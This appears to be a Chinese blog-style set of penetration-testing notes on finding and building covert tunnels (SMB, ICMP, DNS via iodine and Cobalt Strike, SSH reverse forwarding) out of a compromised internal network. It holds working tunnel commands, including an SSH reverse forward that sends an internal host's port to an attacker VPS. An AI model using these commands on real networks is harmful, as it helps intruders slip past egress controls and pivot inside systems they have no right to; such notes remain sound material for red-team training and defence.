当前位置: 首页 > article >正文

内网渗透-隧道判断-SSH-DNS-icmp-smb-上线linux-mac

1.通道判断

#SMB 隧道&通讯&上线

判断:445 通讯

上线:借助通讯后绑定上线

通讯:直接 SMB 协议通讯即可

#ICMP 隧道&通讯&上线

判断:ping 命令

上线:见前面课程

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

#DNS 隧道&通讯&上线

判断:nslookup dig

1、上线环境:内网主机只出网 DNS 协议数据,解决上线

-域名申请及配置

-监听器创建及配置

-后门绑定监听器及生成

2.dns隧道上线

进行域名配置

配置cs

ttx.com 是注册域名

进入会话执行

mode dns-txt

内网主机只出网 DNS 协议数据,解决通讯

https://github.com/yarrick/iodine

判断出网:nslookup www.baidu.com 

服务器:设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P hzy0 192.168.0.1 ns1.ttx.com -DD 设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

客户端:连接密码 hzy0 并绑定域名指向

iodine -f -M 200 -P hzy0 ns1.ttx.com

尝试通讯尝试连接: ssh root@192.168.0.2

3.ssh隧道做内网探针

出站规则松懈:

在linux执行 

将windows8080端口流量通过ssh隧道提交给vps

ssh -CfNg -R 1234:windwosip:8080 root@vps_ip

入站规则松懈:

4.linux上线cs

http://www.kler.cn/a/403702.html

相关文章:

  • 一次封装,解放双手:Requests如何实现0入侵请求与响应的智能加解密
  • 利用D3.js实现数据可视化的简单示例
  • 《操作系统》实验内容 实验二 编程实现进程(线程)同步和互斥(Python 与 PyQt5 实现)
  • 【论文速读】| RobustKV:通过键值对驱逐防御大语言模型免受越狱攻击
  • 实际开发中的协变与逆变案例:数据处理流水线
  • C# 5000 转16进制 字节(激光器串口通讯生成指定格式命令)
  • 网络安全问题概述
  • 三十一、构建完善微服务——API 网关
  • 初始Python篇(4)—— 元组、字典
  • 查找萤石云IOS Sdk中的编解码接口
  • 基于Lora通讯加STM32空气质量检测WIFI通讯-分享
  • Mistral 发布开源多模态模型 Pixtral Large,聊天助手 Le Chat 全面对标 ChatGPT
  • Palo Alto Networks PAN-OS身份认证绕过漏洞复现(CVE-2024-0012)
  • IM项目-----客户端部分未读消息实现
  • 修改仓库中子模块并推送到远程仓库的指定分支
  • 【Android踩过的坑】14.小米系统TTS无法生效的问题
  • 深入分析:固定参考框架在RViz中的作用与对数据可视化的影响 ros ubuntu20.04
  • 《Django 5 By Example》阅读笔记:p211-p236
  • Python什么事迭代器?
  • 游戏开发实现简易实用的ui框架
  • Jenkins更换主题颜色+登录页面LOGO图片
  • MongoDB数据备份与恢复(内含工具下载、数据处理以及常见问题解决方法)
  • 【Unity ShaderGraph实现流体效果之Function入门】
  • 用sqlmap工具打sqli-labs前20关靶场
  • CentOS8 在MySQL8.0 实现半同步复制
  • Linux光标快捷键